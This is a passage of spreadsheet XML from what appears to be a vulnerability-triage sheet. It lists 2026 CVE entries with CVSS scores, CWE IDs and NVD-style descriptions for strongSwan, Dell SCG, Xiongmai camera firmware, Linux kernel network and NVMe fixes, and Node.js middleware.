          <t>CVE-2026-78133</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 6.0.0 through 6.0.7 has a use-after-free in IKEv2 rekeying collision handling.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78133</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78480</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R480"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S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78480</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79393</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in the WS-Addressing Action transformation function in the Sofia IPC daemon in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier allows remote unauthenticated attackers to cause a denial of service or potentially execute arbitrary code via a crafted SOAP request containing a wsa5:Action string exceeding 128 bytes.</t>
        </is>
      </c>
      <c r="S481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79393</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79394</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr"/>
      <c r="Q482" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>An insecure default configuration in the embedded Happytime RTSP server within the Sofia IPC daemon in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier ships with authentication disabled, allowing remote unauthenticated attackers to access live H.264 video and G.711 audio feeds in cleartext over unencrypted RTP/UDP.</t>
        </is>
      </c>
      <c r="S482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79394</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79641</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79641</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80987</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NTB: ntb_transport: Reject oversized TX buffers
ntb_process_tx() handles an oversized buffer by calling tx_handler()
with a NULL data pointer and returning success. ntb_netdev therefore
neither frees the skb in its completion callback nor takes its enqueue
error path, leaking it.
Reject oversized buffers in ntb_transport_tx_enqueue() before acquiring
a queue entry and return -EMSGSIZE. The caller retains ownership of the
buffer, and the preceding netdev patch frees the skb when enqueue
returns this permanent error.</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80987</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80997</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipa: fix stalled modem TX queue after runtime resume
ipa_start_xmit() unconditionally stops the TX queue before calling
pm_runtime_get(), relying on the wake scheduled by runtime resume
(ipa_modem_wake_queue_work()) to restart it once power is ACTIVE.
But that work is queued from within the runtime resume callback,
before the device's power state reaches RPM_ACTIVE, so it can run
while the device is still RPM_RESUMING.  The wake is then consumed
too early: the transmit it restarts stops the queue again,
pm_runtime_get() returns -EINPROGRESS without arranging any future
wake (deferred_resume exists only for RPM_SUSPENDING), and after the
resume completes nothing is left to wake the queue.  Transmit stalls
permanently: packets pile up in the qdisc behind the stopped queue,
the device runtime-suspends, and since the netdev registers no
ndo_tx_timeout the watchdog never fires.  Observed on SM7635
(Fairphone 6) as the cellular data path going permanently deaf
within hours, RX included, since nothing resumes the suspended
endpoints.
Close the window by making the wake work wait for the resume to
complete (pm_runtime_get_sync()) before waking the queue.  Every
queue stop is then guaranteed a later wake that happens while power
is ACTIVE; a transmit racing a new suspend/resume cycle re-schedules
the work.  If the device could not be resumed, wake the queue anyway
so pending packets are dropped by the transmit path rather than
stranded.
The STARTED power flag used to narrow this window: a wake running
before the transmit path's stop suppressed that stop, but only once,
as the flag was cleared by the first stop it absorbed.  Removing the
flag made a single transmit during an in-flight resume sufficient to
strand the queue, which is the form observed.
With an accelerated reproducer (autosuspend delay shortened to 5 ms,
~20 packets/s of TX), an unpatched kernel stalled three times in
230 s / 4380 packets; with this patch the same test ran 3601 s /
70298 packets without a stall.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80997</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80998</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bnxt: ring the doorbell when SW USO exits early
When a burst of packets is handed down to the driver, the driver defers
the doorbell to the end by setting txr-&gt;kick_pending = 1. The normal TX
path handles this, but the SW USO path can miss it if it returns
early.
If bnxt_sw_udp_gso_xmit runs but returns early with NETDEV_TX_BUSY and
txr-&gt;kick_pending was previously set to 1, then the TX queue can
stall because the driver wrote some BDs but never wrote the doorbell.
The device won't know to do the TX which would generate the completion
that would wake the queue back up.
Simplify bnxt_sw_udp_gso_xmit to set txr-&gt;kick_pending in its success
case and check the flag on return. The added check after
bnxt_sw_udp_gso_xmit returns ensures that any pending doorbells are
written handling both successful USO and any early returns, which
prevents the TX queue stall mentioned above.
This TX queue stall was observed on a production system with a netdev TX
watchdog informing about the queue stall.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80998</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>compression is a Node.js and Express compression middleware. In versions before 1.8.2, when a client aborts the connection while a compressed response is still being sent, the zlib stream created to compress that response is never destroyed, so each aborted compressed response leaks its native zlib memory. A remote unauthenticated attacker can repeatedly open requests and disconnect early, exhausting the available memory and crashing the server. All applications using compression are affected. The issue is fixed in compression 1.8.2, and users should upgrade to 1.8.2 or later.</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>multiparty is a Node.js library for parsing multipart/form-data request bodies. In versions from 2.1.0 up to but not including 4.3.1, the parser does not bound the amount of memory used while accumulating the headers of a single multipart part. An unauthenticated attacker can send a single request whose part carries a very large volume of header bytes, forcing the parser to buffer all of them and exhausting the process memory, which crashes the server. This is a denial of service with no confidentiality or integrity impact. The issue is fixed in multiparty 4.3.1, which caps the size of the accumulated part headers. Users should upgrade to multiparty 4.3.1 or later.</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89476</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix stream-&gt;outcnt underflow on duplicate RECONF responses
A cached RECONF chunk may contain more than one request parameter.  A
duplicate response can therefore find and process the same ADD_OUT request
again while another parameter is still outstanding, rolling back outcnt
twice and possibly underflowing it.
Track outstanding request types as bits and clear each bit after its first
response.  Later responses for the same request are then ignored.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89476</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89477</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix NULL deref on untransmitted RECONF completion
sctp_process_strreset_outreq(), sctp_process_strreset_addstrm_out() and
sctp_process_strreset_resp() complete a pending stream reconfiguration
request by stopping the reconf timer on the transport it was sent on:
	t = asoc-&gt;strreset_chunk-&gt;transport;
	if (timer_delete(&amp;t-&gt;reconf_timer))
		sctp_transport_put(t);
chunk-&gt;transport is assigned by __sctp_packet_append_chunk() when the
chunk is appended to an outbound packet, and sctp_outq_flush_ctrl() arms
the reconf timer at that same point. A request already published in
asoc-&gt;strreset_chunk but not yet transmitted has neither, so completing
it dereferences NULL.
Two ways to get there. sctp_send_asconf_del_ip() sets
asoc-&gt;src_out_of_asoc_ok without sending anything when the address being
removed is the association's last one, and sctp_outq_flush_ctrl() then
leaves every non-ASCONF control chunk queued; as only
sctp_process_asconf_ack() clears that flag, it persists. An unprivileged
process that removes such an address and then asks for a stream reset
panics the kernel from softirq. A peer needs neither ASCONF nor local
help: sctp_cmd_interpreter() uncorks the outqueue only once the whole
packet has been processed, so a reply built while walking a RECONF chunk
stays untransmitted for the rest of that walk, and one RECONF chunk
carrying [Incoming SSN Reset Request, Outgoing SSN Reset Request,
Response] -- or two RECONF chunks in one packet -- reaches the same
dereference.
  KASAN: null-ptr-deref in range [0x00000000000001e8-0x00000000000001ef]
  RIP: 0010:timer_delete+0x67/0x110
  Call Trace:
   &lt;IRQ&gt;
   sctp_process_strreset_addstrm_out (net/sctp/stream.c:832)
   sctp_sf_do_reconf (net/sctp/sm_statefuns.c:4212)
   sctp_do_sm (net/sctp/sm_sideeffect.c:1172)
   sctp_assoc_bh_rcv (net/sctp/associola.c:1044)
   sctp_rcv (net/sctp/input.c:243)
   ip_local_deliver (net/ipv4/ip_input.c:262)
   process_backlog (net/core/dev.c:6680)
   &lt;/IRQ&gt;
A response can only acknowledge a request that was actually sent, so do
not match asoc-&gt;strreset_chunk while chunk-&gt;transport is NULL. Guarding
the lookup covers all three completion sites.</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89477</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89480</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: reject a read that transferred too few bytes
nvme_tcp_recv_data() completes a request once the current C2HData PDU
has been consumed. Nothing compares the total bytes received against
the length the command asked for: struct nvme_tcp_request has no
receive-side counter, queue-&gt;data_remaining is per queue, and
blk_mq_end_request() completes for blk_rq_bytes(rq) unconditionally
with no residual concept anywhere above.
A controller can therefore answer a 4096-byte read with 512 bytes and
have it reported as a complete read; user space then gets 4096 bytes of
which 3584 are whatever was already in the page. I reproduced that with
a test target.
Count the bytes received and refuse to complete a successful read whose
count does not match, at the two NVME_TCP_F_DATA_SUCCESS paths and in
nvme_tcp_process_nvme_cqe(). The success test shifts req-&gt;status right
by one, because the driver keeps the wire value there and shifts it on
completion, so the check must see what the completion path will see.
Only REQ_OP_READ is checked, because there the length comes from the
sectors the request covers; a passthrough command is built by its
submitter, which picks both command and buffer, so the kernel has
nothing to compare against.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89480</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89481</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: fix host memory disclosure on R2T for a read command
nvme_tcp_handle_r2t() does not check the direction of the request the
R2T refers to. A malicious controller can send an R2T for a READ and
the host will answer it: nvme_tcp_setup_h2c_data_pdu() builds the
H2CData header and nvme_tcp_try_send_data() sends the request's data
buffer. That buffer is the READ destination, so its contents go to the
controller.
The command then completes normally and nothing is logged.
Against a test controller that answers every READ with an R2T, a 4096
byte buffered read returned all 4096 bytes, split over two R2Ts. The
pages contained stale kernel data, including an array of struct page
pointers.
Reject an R2T for a request that is not a write.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89481</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89483</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
